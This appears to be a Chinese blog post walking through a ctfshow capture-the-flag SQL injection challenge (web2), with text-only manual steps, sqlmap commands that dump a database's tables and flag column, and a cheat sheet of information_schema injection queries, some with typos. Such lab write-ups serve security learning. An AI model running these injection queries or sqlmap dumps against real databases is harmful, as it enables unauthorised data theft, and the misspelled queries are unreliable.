ctfshow—web—web2

打开靶机,根据提示是SQL注入

 

 打开后看到登录窗口

 

 

方法一、手工注入

抓取数据包

 

 开始SQL注入测试

利用万能密码,登录成功

 

查看回显位置

 

 

查询数据库

 

 查询数据库内数据表

 

 如果想整齐一点显示可以添加group_concat()

 

 查询字段

 

 查询字段内容

 

 成功拿到flag

方法二、sqlmap注入

把之前抓取的数据复制到sqlmap根目录下test.txt内

 

 保存完成后开始跑数据库名

python2 sqlmap.py -r test.txt --dbs

 

 跑数据库内数据表

python2 sqlmap.py -r test.txt -D web2 --tables

 

 查看字段

python2 sqlmap.py -r test.txt -D web2 -T flag --columns

 

  查询字段内容

python2 sqlmap.py -r test.txt -D web2 -T flag -C flag --dump

 

 成功拿到flag

 

 

sql手工注入常用语句:

普通语句:schema_name——数据库名;table_name——表名;column_name——字段名;

查询数据库:select schema_name from information_schema.schemata#

      slelect database()#

查询数据库表:select table_name from information_schema.tables where table_schema='数据库名'#

查询字段名:select column_name from infromation_schema.columns where table_name='表名'#

查询字段内容:select * from 表名#

posted @ 2020-02-25 10:33  anweilx  阅读(3994)  评论(0编辑  收藏  举报